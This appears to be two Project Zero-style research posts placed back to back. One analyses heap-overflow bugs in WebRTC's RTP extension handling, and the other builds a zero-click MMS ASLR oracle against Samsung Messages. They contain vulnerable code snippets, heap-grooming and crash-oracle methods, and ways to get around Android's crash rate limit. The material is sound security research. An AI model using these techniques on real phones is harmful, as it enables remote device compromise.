I started off by trying to exploit two bugs, CVE-2020-6389 and CVE-2020-6387.

Both of these vulnerabilities are in WebRTC’s Remote Transport Protocol (RTP) processing. RTP is the protocol WebRTC uses to transport audio and video content from peer to peer. RTP supports extensions, which are extra pieces of data that can be included in each packet to tell the destination peer how to display or process the data. For example, there is an extension that contains information about the screen orientation of the sending device, and one that contains the volume level. Both of these vulnerabilities occurred in extensions that had been implemented in WebRTC in 2019.

CVE-2020-6389 occurred in the frame marking extension, which contains information on how video content is split into frames. The bug is in how it processes layer information: WebRTC only supports five layers, but the layer number is a three-bit field in the extension, which means it can go as high as seven. This leads to an out-of-bounds write in the following code. temporal_idx is set from the layer number in the extension. 

if (layer_info_it->second[temporal_idx] != -1 &&
AheadOf<uint16_t>(layer_info_it->second[temporal_idx], frame->id.picture_id)) {
      // Not a newer frame. No subsequent layer info needs update.
     break;
   }
  ...
   layer_info_it->second[temporal_idx] = frame->id.picture_id;

The final line of code is where the out-of-bounds write occurs, as the array only contains five elements. This bug also has some limitations not obvious from the above code. To start, there is a check before the write, that checks whether the current value of the memory, casted to a 16-bit unsigned integer is more than the current sequence number. The write only occurs if this is true. Practically, this wasn’t much of a limitation, a crash usually occurred after two or three times when I tested it. A more serious limitation is that the layer_info_it->second field has a 64-bit integer type, but  frame->id.picture_id is a 16-bit integer. This means that while this bug allows an attacker to write up to three 64-bit integers outside of a fixed size heap buffer, the values that can be written are very limited, and are too small to represent pointers.

CVE-2020-6387 is a bug in how the video timing extension is processed by Forward Error Correction (FEC). FEC copies incoming RTP packets, and then clears certain extensions when attempting to correct errors. This vulnerability occurs because extensions of the video timing type are not verified to be of the expected length before they are cleared. The code causing this bug is as follows:

case RTPExtensionType::kRtpExtensionVideoTiming: {
       // Nullify 3 last entries: packetization delay and 2 network timestamps.
       // Each of them is 2 bytes.
       uint8_t* p = WriteAt(extension.offset) + VideoSendTiming::kPacerExitDeltaOffset;
       memset(
           p,
           0, 6);
       break;
     }

The value of VideoSendTiming::kPacerExitDeltaOffset is 7, so this code writes six zeros from offset 7 to offset 13 from the start of the extension in the packet. However, there is no check that the extension data is more than 13 bytes long, or even that the packet has this number of bytes left. The result of this bug is that an attacker can write up to six zeros to the heap at an offset of up to seven bytes from a variable sized heap buffer. This bug is better than CVE-2020-6389 in some ways and worse in others. It is better in that the heap buffer that can be overflowed is variable size, which gives a lot more options of what can be overwritten by this bug on the heap. The offset also offers some flexibility on where the zeros are written, and the write does not have to be aligned, whereas CVE-2020-6389 requires 64-bit alignment. This bug is worse in that the value written has to be zero, and the size of the area that can be written is smaller (six bytes versus 24).

Moving the Instruction Pointer


I started off by seeing if it was possible to use either of these bugs to move the instruction pointer. Modern Android uses jemalloc, a slab allocator which doesn’t use inline heap headers, so corrupting heap metadata was not an option. Instead, I compiled WebRTC for Android with symbols, and loaded it in IDA. I then went through the available object types to see if there was anything that could obviously be used to move the instruction pointer or improve the capabilities of the bug. I didn’t find anything.

I thought maybe I could use CVE-2020-6389 to overwrite a length and cause a larger overflow, but this had some problems. To start, the bug writes a 64-bit integer, meanwhile a lot of length fields are 32-bit integers, which means the write also overwrites something else, and can only write a non-zero value if the length is 64-bit aligned. The location of the bug in processing is also problematic, as it does the overwrite near the end of the incoming packet being processed, meaning that many objects are not accessed again after this point, so any overwritten memory would never be used again. CVE-2020-6389 also overwrites a heap buffer of fixed size 80, which limits the object types that can be affected by this bug. I didn’t think CVE-2020-6387 would be viable for this purpose either, as it can only write zeros, which can only make a length smaller.

I wasn’t sure where to go at this point, so I triggered CVE-2020-6389 a few dozen times on Android to see if there were any crashes at an address wider than 16-bits, hoping they might give me ideas of ways that this bug could influence the behavior of the code other than overwriting a pointer with an invalid 16-bit value. To my surprise, it crashed with the instruction pointer set to a value that had clearly been read off the heap about one in 20 times. 

Analyzing the crash, it turned out that a StunMessage object was being allocated after the overflowed region. The members of the StunMessage class are as follows.

protected:
  std::vector<std::unique_ptr<StunAttribute>> attrs_;
 ...
 private:
  ...
  uint16_t type_;
  uint16_t length_;
  std::string transaction_id_;
  uint32_t reduced_transaction_id_;
  uint32_t stun_magic_cookie_;

So after the vtable, the first member is a vector. How are vectors laid out in memory? It turns out its first two members are as follows.

  pointer __begin_;
  pointer __end_;

These pointers point to the beginning and the end of the vector’s contents in memory. During the crash, the __end_ member was overwritten with a small 16-bit integer. Vector iteration works by starting at the __begin_ pointer and incrementing until the  __end_ pointer is reached, so this change means that the next time the vector is iterated over, usually in the destructor, it will go out of bounds. Since this vector contains virtual objects of type StunAttribute, it will perform a virtual call to each element, to call its destructor. This virtual call on out-of-bounds memory was what was moving the instruction pointer.

This seemed like a reasonable way to control the instruction pointer, except for one problem: in a typical configuration, it is not possible for an attacker at one end of a WebRTC connection to send STUN to the user at the other, instead they each communicate with their own STUN server. I asked Philipp Hancke of webrtchacks if he knew of a way. He suggested this method, which involves specifying a TCP server controlled by the attacker as a potential routable path between two peers, called an ICE candidate. Both the attacker and target device will then communicate through this server, including STUN messages.

This allowed me to send STUN messages with an unusually large number of attributes. This was necessary because in order to control the instruction pointer, I would need to be able to control what showed up in memory after the STUN attribute vector. jemalloc allocates similar sized allocations, determined by predefined size classes in contiguous memory runs. The less used a size class is, the more likely it is that two objects of the same size class will be allocated one after the other. 

Typically, STUN messages have a small number of attributes, which translates to a vector buffer size of 32 or 64 bytes, which are both very frequently used size classes. Instead, I sent STUN messages with 128 attributes, which translated to a vector buffer size of 1024 bytes, which happens to be an infrequently used size class in WebRTC. By sending many STUN messages with this number of attributes, while at the same time sending RTP packets of size 1024 containing the desired pointer value, interspersed with packets containing the bug, I was able to get a virtual call on that pointer value about one in five times. This was good enough for use in an exploit, and I decided to move on to breaking ASLR.

Breaking ASLR


There were two possible approaches for breaking ASLR in this exploit. One was to use one of the above bugs to read memory and send it back to the attacker device or TCP server somehow, the other was to use some sort of crash oracle to determine the memory layout.

I started off by seeing whether it was possible to use one of the bugs to read memory remotely from the target device. Mark Brand suggested that it might be possible to use CVE-2020-6387 to accomplish this by setting the low bytes of a pointer to outgoing data to zero, causing out-of-bounds data to be sent instead of the actual data. This seemed like a promising approach, so I used IDA to look for potential objects.

It turned out there were quite a few, and they all had problems. I spent some time on SendPacketMessageData and DataReceivedMessageData. These objects are used to store pointers to outgoing RTP data while it is queued. They contain a CopyOnWriteBuffer object, and its first member is a ref-counted pointer to an rtc::Buffer object. It was possible to set the bottom bytes of this pointer to be zero using CVE-2020-6387. Unfortunately, the structure of rtc::Buffer made revealing memory this way challenging.

RefCountedObject vtable;
size_t size_;
size_t capacity_;
std::unique_ptr<T[]> data_;

I was hoping that it would be possible to make the clipped pointer to this structure to point to some other object on the heap that had a pointer in the location of the data_ pointer, and that data would get sent instead. However, it turned out that in the process of sending data, all four members on the object above get accessed and need to be reasonably valid. I went through all the available objects in the same size class as the rtc::Buffer class, but couldn’t find one with these exact properties. 

I then considered that instead of using a different object, I could use an rtc::Buffer object that had already been freed, with a specific backing buffer size that could be replaced with an object containing pointers using heap manipulation. This didn’t work out either. This was largely an issue of reliability. To start off, an rtc::Buffer object is 36 bytes, which translates to size class 48 in jemalloc, meaning 48 bytes get allocated. Imagining some contiguous allocations of this type, the addresses would be as follows.

0x[...]0000      buffer 0
0x[...]0030      buffer 1
0x[...]0060      buffer 2
0x[...]0090      buffer 3
0x[...]00c0      buffer 4
0x[...]00f0       buffer 5
0x[...]0120      buffer 6
...
   
If the first byte of buffers 0 through 5 are set to zero by the vulnerability, they will land on a valid buffer, but if buffer 6 is set to zero, it will not, because 256 doesn’t divide evenly into 48. The end result is that every time the bug hits the SendPacketMessageData  object, there is only a one in three chance it will end up pointing to a valid rtc::Buffer. Hitting the object in the first place is also unreliable, because there are many other allocations of a similar size being made by WebRTC. It’s possible to increase the number of these objects on the heap, and the amount of time before they are sent by using the TCP server to make the connection very slow, but even then I could only hit the structure less than 10% of the time. Having to manipulate the heap so that there are many freed rtc::Buffer objects in a row in the first place, and the backing has been replaced by something containing pointers added even more unreliability. I eventually abandoned this approach because I didn’t think I could get it reliable enough to use in an exploit with a reasonable amount of effort, though I think it’s probably possible. The crash behavior of the application being attacked also matters a lot. This would probably work on an application that respawns immediately in the case of a crash, but would be a lot less practical on an application that stops respawning unless there is a certain delay, which is common on Android.

I also looked a lot at how outgoing packets are generated by WebRTC, especially Remote Transport Control Protocol (RTCP), which a peer always sends, even if it is just receiving audio or video. However, most outgoing packets are generated on the stack, so it is not possible to alter them using heap corruption bugs.

I also considered using a crash oracle to break ASLR, but I felt it was unlikely to succeed with these specific bugs. To start, hitting a heap allocation with them is unreliable, so it would be difficult to tell whether a crash had occurred due to a specific condition, or just because the bug had failed. I was also unsure whether it would even be possible to create detectable conditions considering the limited capabilities of these bugs.

I also thought about using CVE-2020-6387 to alter a vtable or a function pointer in order to read memory, cause behavior detectable by a crash oracle or perform offset-based exploitation that doesn’t require ASLR to be broken. I decided not to pursue this path, because the end result would depend on which functions and vtables are loaded at locations ending in zero, which varies greatly between builds. An exploit written using this method would require a large amount of modification to work on even slightly different versions of WebRTC, and there is no guarantee it would work at all.

I decided at this point that I needed to look for new bugs that could break ASLR, as neither of the ones I’d found recently could do it easily.

Stay tuned for Part 2: A Better Bug, which is scheduled for Wednesday, August 5.

MMS Exploit Part 4: MMS Primer, Completing the ASLR Oracle

4 August 2020 at 16:21
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the fourth of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 3 of the series, I chose one of the 174 obvious Qmage memory corruption crashes reported in Issue #2002 for exploitation. It was a linear heap buffer overflow in RLE decompression with an arbitrary allocation size, overflow size, and overflow data. By carefully adjusting the bitmap dimensions (which control the heap region size), we managed to place the pixel storage buffer directly before the associated android::Bitmap object in memory, allowing us to reliably corrupt it. From there, we constructed some potential RCE primitives, as well as a memory oracle that triggers a control flow-neutral read from a chosen memory area, triggering a crash or not depending on whether the address range is mapped and readable. In terms of low-level capabilities, this is a satisfying set of options to continue working with.

To make further progress in the exploit development, we finally have to get familiar with the MMS protocol that we'll be using as the medium of our attack. Specifically, we need to find a way to remotely leak information about the crash of the target Messages app, or lack thereof, to complete the ASLR oracle and build a more complex ASLR bypass logic on top of it. This is not completely trivial considering the unidirectional nature of MMS, but ultimately possible thanks to the little used feature of delivery reports. However, first things first – let's start with learning more about the protocol itself, and how we can move from sending test messages from a smartphone, to programmatically running experiments from a more comfortable environment of one's workstation.

Setting up a test environment

In order to be able to test MMS effectively, we need an easy way to deliver them to the target device from our PC. There are various methods to achieve this, for example Joshua Drake suggested two ways to send MMS without carriers in his Stagefright Black Hat presentation in 2015 (slides 84-85). However, I decided to take a more practical approach and send all messages through carriers, to be able to observe fully accurate results and spot any real-life issues related to conducting such an attack in practice.

To that end, I purchased two SIM cards for sending and receiving messages, and enabled an "unlimited MMS" package on the sender one to avoid excessive costs. Then, I found and licensed the NowSMS Windows software, which is a powerful solution for sending, receiving, and processing SMS/MMS. It may serve as an SMS server, MMS server, WAP Push Proxy Gateway and Multimedia Messaging Center (MMSC), and has a number of advanced features that are beyond the scope of our use case. Most importantly, it can be used to send messages through a locally connected GSM modem, or an Android phone acting as one. This is precisely the functionality we need, and it's available even in the most basic Now SMS & MMS Lite package. Notably, the service can be used in a number of ways: via a local web interface, through an HTTP API, and through developer API made available for technologies such as PHP, Java and .NET (C#, Visual Basic). The vendor also maintains an extensive documentation regarding both the product and relevant mobile protocols, and hosts an active user forum. All in all, NowSMS proved extremely helpful in my research by making interactions with SMS/MMS easily accessible on a PC, both manually and programmatically.

The screenshot below shows how the MMS sending page looks like in the Web UI (in Developer Mode). We can immediately spot a number of new and unfamiliar settings which are not available to the user when sending a message on a typical mobile phone. It looks like we have gained a much more fine grained control over what is transmitted over the cellular network:

NowSMS MMS sending web panel

The Android phone acting as a modem may operate in three modes: "Local WiFi", "Remote Direct" and "Remote via Cloud". In my case, I used the Remote Direct mode, and connected the sender phone to the local network via an ethernet cable, to prevent any disruptions related to wireless connectivity. At the same time, I connected the victim phone to my workstation via a USB cable for command line access and screen capturing. The structure of my setup is illustrated below:

Example MMS testing setup

I used a Samsung Galaxy A50 as the modem, and Samsung Galaxy Note 10+ as the receiver. In addition to having them connected to the PC for data transfer, it was obviously necessary to keep them charged throughout the testing, and to ensure that they were placed in a spot with strong cellular signal.

Crafting a raw MMS PDU

Now that we have a solid testing environment setup on a PC, we can dig deeper into MMS itself to better understand how it works. MMS is a relatively old technology dating back to circa 2001-2002, and since its inner workings are relevant mostly to mobile network operators, it is not documented as well as many other technologies and protocols seen in widespread use today. However, throughout this project, I have dug up a number of comprehensive books, articles, presentation slides and other educational materials on the subject. They are listed below for your convenience:


The volume of these resources may seem overwhelming, but in fact, we are only interested in a small subset of the MMS architecture, namely the MM1 protocol used between mobile devices and the MMSC (Multimedia Messaging Service Centre). The Phone to MMSC Protocol (MM1) slides from NowSMS are a highly recommended read to get a good overview of its design. In essence, we can view an MMS message as a self-contained binary file of MIME type application/vnd.wap.mms-message. It contains a number of headers (some of them required, some optional), followed by optional Multipart objects – the actual multimedia content of the message (images, audio, video, etc.). The details of the MMS binary encoding are defined by the MMS Encapsulation Protocol, and the list of headers compatible with the M-Send.req request can be found in that document in section "6.1.1 Send Request" on page 17.

An example source file of an MMS message is shown below:

 1:   X-Mms-Message-Type: m-send-req
 2:   X-Mms-Version: 1.3
 3:   To: 0123456789
 4:   Subject: MMS subject
 5:   X-Mms-Message-Class: Personal
 6:   X-Mms-Priority: Normal
 7:   X-NowMMS-Content-Location: message.txt;text/plain
 8:   X-NowMMS-Content-Location: image.jpg;image/jpeg

Lines 1-3 specify mandatory headers, lines 4-6 specify optional headers, and lines 7-8 contain NowSMS-specific headers that point to the multimedia files to include in the message, and indicate their respective MIME types. Such MMS source can be converted to its binary form with NowSMS mmscomp command line utility:

Composing encapsulated MMS with the mmscomp tool

The first 128 bytes of the message.MMS file are shown below; the rest are just the remainder of the JPEG image contents:

00000000: 8c 80 8d 90 97 30 31 32 33 34 35 36 37 38 39 00  .....0123456789.
00000010: 96 4d 4d 53 20 73 75 62 6a 65 63 74 00 8a 80 8f  .MMS subject....
00000020: 81 84 a3 02 1e 0d 83 c0 22 3c 6d 65 73 73 61 67  ........"<messag
00000030: 65 2e 74 78 74 3e 00 8e 6d 65 73 73 61 67 65 2e  e.txt>..message.
00000040: 74 78 74 00 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64  txt.Hello, world
00000050: 21 1a 84 df 48 9e c0 22 3c 69 6d 61 67 65 2e 6a  !...H.."<image.j
00000060: 70 67 3e 00 8e 69 6d 61 67 65 2e 6a 70 67 00 ff  pg>..image.jpg..
00000070: d8 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00  .....Adobe.d....

In this blob, we can see the binary-encoded headers (for example the two initial 0x8c 0x80 bytes encode "X-Mms-Message-Type: m-send-req"), as well as a number of plaintext strings corresponding to the header values, attachment file names, and data of the embedded files themselves. Such a raw MMS file can be sent via NowSMS, and will be delivered in a very similar form to the recipient device.

As a side note, correctly formatted MMS messages are also expected to contain SMIL (Synchronized Multimedia Integration Language) resources, which define how the multimedia and text should be presented to the user. If you are interested in more details on how they're used in MMS, there is a good tutorial by NowSMS on the subject. However, the SMIL markup seems to be optional in practice, and client apps such as Samsung Messages will correctly display MMS without it. When it comes to file attachments in general, what matters the most for us is that their MIME types are specified explicitly and separately in the encoded message, which enables us to freely send Qmage files marked as image/jpeg (or some other image type) and have them automatically loaded as bitmaps.

MMS delivery reports

Delivery reports have been part of the MMS specification since version 1.0. They enable the sender of a message to request a confirmation of its successful delivery to the recipient. It's one of the very few ways for the sender to receive any kind of (indirect) feedback from the target phone, and it is what we intend to use to complete our ASLR oracle mechanism.

When composing the MMS PDU, a delivery report can be requested by setting the X-Mms-Delivery-Report header to "yes", which is expressed as 0x86 0x81 in binary. Here's how the header is described in Gwenaël Le Bodic's book:

Request for a delivery report. This parameter indicates whether or not delivery report(s) are to be generated for the submitted message. Two values can be assigned to this parameter: 'yes' (delivery report is to be generated) or 'no' (no delivery report requested). If the message class is 'auto', then this parameter is present in the submission PDU and is set to 'no'.

Quite frankly, I have never legitimately used this feature of MMS before. Even though it's part of the protocol, the option to request delivery reports is missing in some common apps such as Google Messages (it only supports SMS delivery reports). However, Samsung Messages does support it, so we can enable the reports under Settings > More settings > Multimedia messages > Show when delivered, and test it out:

Delivery reports in Samsung Messages

The option does indeed work as advertised. Let's take a deeper look at how it is implemented in the protocol and in the client app, and how we can make use of it in our exploit.

A closer look at MM1

Once again, let me start by emphasizing that Gwenaël's slides 24-41 and the entire NowSMS MM1 slide deck explain the MM1 protocol and data flows in great detail. In our case, let's analyze the transactions involved in sending and receiving an MMS in an environment with a few assumptions:

  • The originator and recipient are both in the same network, so there is no inter-operator communication taking place. Whether this is true or not shouldn't make any practical difference for us, as the data exchange between them happens seamlessly over the MM4 protocol and doesn't have any observable side effects (that I know of).
  • The recipient has the auto-retrieval of MMS enabled, which I understand to be the default on a majority or all of Samsung devices.
  • The recipient has good enough connectivity to be able to download the message.
  • The delivery report is requested by the originator.

Under these conditions, the message exchange between two mobile phones and the MMSC is illustrated in the following diagram:

MM1 data flow when sending a legitimate MMS

In a typical scenario, the sender initiates an M-send.req HTTP POST transaction to the carrier. Once the MMS is transmitted in full, the MMSC sends a WAP PUSH notification to the recipient to announce that a message is awaiting. In the case of auto-retrieve, the client app immediately sends an HTTP GET request, and receives the serialized MMS data in response. Finally, it acknowledges the receipt of the message with a M-notifyresp.ind POST request, and that information is forwarded back to the sender in the form of an M-delivery.ind transaction. This concludes the communication between the participating parties.

The biggest problem shown in the diagram is the fact that the Samsung Messages app parses the incoming MMS before finalizing communication with the MMSC through the M-notifyresp.ind PDU. Ideally, any processing of external data should only take place once the connection with MMSC is closed. Otherwise, if the app crashes during the processing of a corrupted media file, the final M-notifyresp.ind message is never transmitted, which causes the MMSC to classify the MMS delivery as unsuccessful and prevents it from sending the delivery receipt to the originator. This creates a very easily observable side channel, revealing whether Samsung Messages crashed on the victim phone or not.

MM1 data flow when sending a corrupted Qmage file via MMS

Coupled with the powerful memory-probing primitive constructed in Part 3, the side channel enables an attacker to remotely query the readability of arbitrary address ranges, with no user interaction required. Such a capability is enormously useful on Android due to the Zygote design, and the fact that the location of code and data in the address space is persistent across program crashes. Consequently, even though the ASLR oracle output only carries 1 bit of information at a time, the overall attack can be broken down into multiple steps, and their results combined to determine complete 64-bit addresses of the necessary gadgets.

We can confirm the behavior by checking the logcat logs on the target device. When we send a regular MMS message, we can see both the WSP/HTTP GET.req and M-notifyresp.ind (POST) requests being made:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:25:25.494 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:25.548 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:26.449 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:27.388 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=66626
07-23 11:25:28.825 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: POST http://<redacted>, proxy=<redacted>, PDU size=16
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:25:28.831 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:25:29.155 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=0

The time span between receiving the full message from the MMSC and sending the acknowledgement is around 1.5 seconds. On the other hand, when we send a malformed Qmage file, only the WSP/HTTP GET.req request is visible in the logs:

d2s:/ $ logcat -v time | grep "HTTP: "
07-23 11:32:10.890 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: GET http://<redacted>, proxy=<redacted>, PDU size=0
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: User-Agent=SAMSUNG-ANDROID-MMS/SM-N975F
07-23 11:32:10.899 I/CS/MmsHttpClient(30665): [[email protected]] HTTP: UaProfUrl=http://wap.samsungmobile.com/uaprof/SAMSUNGUAPROF.xml
07-23 11:32:11.272 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: 200 OK
07-23 11:32:11.273 D/CS/MmsHttpClient(30665): [[email protected]] HTTP: response size=935

Before M-notifyresp.ind can be sent, the process crashes after ~1.3 seconds of reading the HTTP response:

130|d2s:/ $ logcat -b crash -v time
07-23 11:32:12.585 F/libc    (30665): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 31866 (pool-8-thread-1), pid 30665 (droid.messaging)

This confirms the insecure behavior on the client app side. How does it look from the perspective of an attacker? When the M-delivery.ind PDU is received by NowSMS, it is decoded and saved in a text file with a .HDR extension in the "C:\Program Files (x86)\NowSMS\MMS-IN" directory, for example C0B04508.HDR:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 09:55:00 GMT
Status: Retrieved

The status is indicated as "retrieved", and the report can be associated with the original message through the value of the Message-id header. Otherwise, if the original MMS crashes the target phone, we don't see any immediate return messages in the MMS-IN directory. Depending on the MMS expiry period (specified in the headers or defined by the operator's default setting), the carrier may retry to deliver the message, and if that fails, it eventually expires and the sender is notified about it too:

X-NowMMS-RCPT-TO: <redacted>/TYPE=PLMN
X-NowMMS-Modem-Name: NowSMSModem - a50
Message-type: m-delivery-ind
MMS-version: 1.2
Message-id: [email protected]
To: <redacted>/TYPE=PLMN
Date: Thu, 23 Jul 2020 11:03:39 GMT
Status: Expired

The carriers I have experimented with have a default expiration period of 48 hours, and it can be manually adjusted with the X-Mms-Expiry header to values between 1 minute and 48 hours. In my exploit, I didn't use the expiration aspect at all, and simply assumed that Samsung Messages crashed if the delivery report was not received within 30 seconds of sending the message. This completes the construction of a functional MMS-based ASLR oracle, which is an essential building block of a generic ASLR bypass logic discussed in the next blog post in the series.

Further thoughts on oracle reliability

The reliability of the presented ASLR oracle scheme is generally high, provided that both the sender and recipient devices maintain good connectivity with the MMSC. The weakest link is by far the android::Bitmap memory corruption primitive, which relies on two subsequent 160-byte jemalloc allocations being adjacent in memory. This generally holds true, but we have no guarantee that the condition will be always met, especially since the relevant jemalloc bin (chunks between 129-160 bytes in size) is not particularly quiet and is also utilized for other unrelated objects by the Samsung Messages app. Needless to say, any ASLR bypass logic we devise will most likely assume 100% accuracy of the oracle output, so we have to put some extra effort to make sure that the oracle can be indeed relied upon.

One simple technique we can use to improve the reliability of the attack is to have each oracle MMS processed with a relatively clean state of the heap. This can be accomplished by unconditionally crashing the client app with a malformed Qmage file, causing the com.samsung.android.messaging process to be killed and restarted from scratch when the next message arrives on the phone. Of course the ASLR oracle output false already implies a crash taking place, so extra artificial crashes are only needed at the very beginning of the attack (before the first oracle query), and after each query returning true. The type of the artificial crash doesn't matter as long as it always reproduces; it can be a huge out-of-bounds read/write, a NULL pointer dereference, assertion failure, or any condition that doesn't depend on the existing state of the process to trigger a crash. In my exploit, I used the signal_sigsegv_400357fc6c_7014_c1d4fedf1cbcdd583e0f331f32df1f72.qmg sample from crash 39b052a01c99f60982ec92f8d01a5401, which accesses a NULL pointer returned by a malloc call with a negative integer passed as the size.

This one trick allowed me to achieve an oracle accuracy rate of more than 99% (loose estimate) on my Galaxy Note 10+ test device. In my case, it was sufficient to completely rely on each single measurement to successfully defeat ASLR without making any mistakes during the process, but your mileage may vary depending on the device model, Android version, existing history of messages in the SMS app, or even specific options enabled on the phone (such as WiFi) during the attack. If the oracle accuracy drops below a certain threshold, it may be necessary to introduce redundant memory probes sent to the target for each tested address range, and only return the output value to the higher levels of the exploit code once there is enough confidence about its validity.

ActivityManager and crash rate limiting on Android

Based on what we know so far, we can assume that any potential attack will involve a number of crashes of Samsung Messages on the victim phone, some of them carrying address space information and some triggered simply to reset the heap. The ability to continuously crash and have an app restarted on a remote device is a crucial requirement, so we should verify that this is actually possible on Android. If we send corrupted Qmages via MMS twice in a short span of time, we will observe two crashes, as expected:

d2s:/data/local/tmp $ logcat -b crash -v time
07-23 15:52:45.549 F/libc    ( 8930): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10606 (pool-5-thread-1), pid 8930 (droid.messaging)
[...]
07-23 15:52:55.517 F/libc    (10727): Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 10776 (pool-5-thread-1), pid 10727 (droid.messaging)
[...]

If we then send a third message, Samsung Messages won't be spawned to handle it. Instead, we'll see the following message:

07-23 15:54:28.639 23268 23317 W BroadcastQueue: Unable to launch app com.samsung.android.messaging/10128 for broadcast Intent { act=android.provider.Telephony.WAP_PUSH_DELIVER typ=application/vnd.wap.mms-message flg=0x18000010 cmp=com.samsung.android.messaging/.ui.receiver.smsmms.DefaultSmsAppMmsReceiver (has extras) }: process is bad

At this point, we (as the attacker) are cut off from the device and cannot reach or interact with the remote Qmage attack surface anymore. In fact, the victim won't be able to receive SMS/MMS from anyone until they manually start the Messages app again. So what happened here, and does it mean that all our efforts up to this point were in vain?

When I first saw the warning, I immediately went looking for clues at cs.android.com. It was easy to locate the culprit based on the "process is bad" string: it is printed out when a call to mService.startProcessLocked fails in BroadcastQueue.java. This may generally only happen when mService.mAppErrors.isBadProcessLocked returns true for the app in question:

boolean isBadProcessLocked(ApplicationInfo info) {
      return mBadProcesses.get(info.processName, info.uid) != null;
}

There is a list of bad processes in the system, but how does an app end up on that list? The answer can be found in the handleAppCrashLocked method in AppErrors.java, and specifically in the following lines (slightly reformatted for readability):

if (crashTime != null && now < crashTime + ProcessList.MIN_CRASH_INTERVAL) {
    // The process crashed again very quickly.
    // If it was a bound foreground service, let's try to restart again in a
    // while, otherwise the process loses!
    Slog.w(TAG, "Process " + app.info.processName
            + " has crashed too many times: killing!");
[...]
           mBadProcesses.put(app.info.processName, app.uid,
                    new BadProcessInfo(now, shortMsg, longMsg, stackTrace));

In the above snippet, now is the current timestamp and crashTime is the time of the last crash of the app. Accordingly, the logic checks if two crashes in a single app have occurred in a short period of time, and if so, it bans the process indefinitely from future restarts. How short is short? Let's look up the MIN_CRASH_INTERVAL constant in ProcessList.java:

// The minimum time we allow between crashes, for us to consider this
// application to be bad and stop and its services and reject broadcasts.
static final int MIN_CRASH_INTERVAL = 60 * 1000;

It's 60 seconds. From the attacker's point of view, this is certainly not perfect, but also not terribly bad. This logic of the ActivityManager service means that at no point in time, should we trigger two crashes of the Messages app within one minute, or the attack will be halted. In the context of our ASLR oracle, it limits the probing rate to one query a minute, which may be acceptable or not depending on how many queries are required to break the ASLR. For example, if we consider a realistic attack to be carried out during the night, that leaves us with a maximum of 8 hours × 60 minutes ~= 480 queries. The good news (for exploitation) is, that there is no absolute limit of crashes for one app, and we can interact with the MMS client indefinitely as long as we slow down the communication to meet the crash interval condition.

The diagram below illustrates the high-level process of safely sending two ASLR oracle queries to a target phone, taking the mandatory cooldown period into account. The first query returns true and takes two MMS to complete (one probe and one unconditional crash), and the second one returns false. Note how there is always a guaranteed 60 second gap between two subsequent crashes on the recipient device:

The process of sending subsequent two ASLR oracle queries to the target phone

On a closing note, there is one more important detail to consider in the crash handling logic. If we look closely at the source code of the handleAppCrashLocked method, we can notice that the timestamp is obtained through the SystemClock.uptimeMillis() API:

       final long now = SystemClock.uptimeMillis();

As the documentation states, this is not exactly the wall clock time we have assumed it to be:

uptimeMillis() is counted in milliseconds since the system was booted. This clock stops when the system enters deep sleep (CPU off, display dark, device waiting for external input), but is not affected by clock scaling, idle, or other power saving mechanisms. This is the basis for most interval timing such as Thread#sleep(long), Object#wait(long), and System#nanoTime. This clock is guaranteed to be monotonic, and is suitable for interval timing when the interval does not span device sleep. Most methods that accept a timestamp value currently expect the uptimeMillis() clock.

According to my experimentation on the Galaxy Note 10+ device, when the phone is in an inactive state (e.g. set aside on a bedside table with the display off), the clock indeed doesn't progress. This makes practical zero-click exploitation even more challenging, as it is not enough to just wait for 60 seconds before sending the next MMS. Instead, the attacker has to keep the target phone somehow occupied for those 60 seconds, while not triggering any vibration/notification sounds at the same time. The most obvious way to achieve this is through the cellular network, and I have identified at least three techniques that could be used to silently and remotely keep a phone busy:

  • By sending an MMS with empty text (i.e. an empty text/plain MIME file), a few seconds can be wasted while the phone receives and processes the message. In the end, the empty text leads to an unhandled Java exception being thrown in the Messages app, preventing it from showing any notification to the user. I abused this behavior in my exploit to send an initial "ping" to quietly verify that the recipient phone is responsive (see 0:43-0:56 in the exploit demo). It has been fixed in Samsung Messages since version 11.1.0.61.
  • By sending an MMS with very long text (at least around 140 kB in my testing), a few seconds can be similarly wasted by the victim phone. In this corner case, the misbehavior is slightly different and varies between devices, as the unhandled Java exception is thrown in the midst of generating a user notification, when it is already displayed on the screen, but before the notification sound rings. As such, it also qualifies as a (literally) silent CPU cycle burning trick.
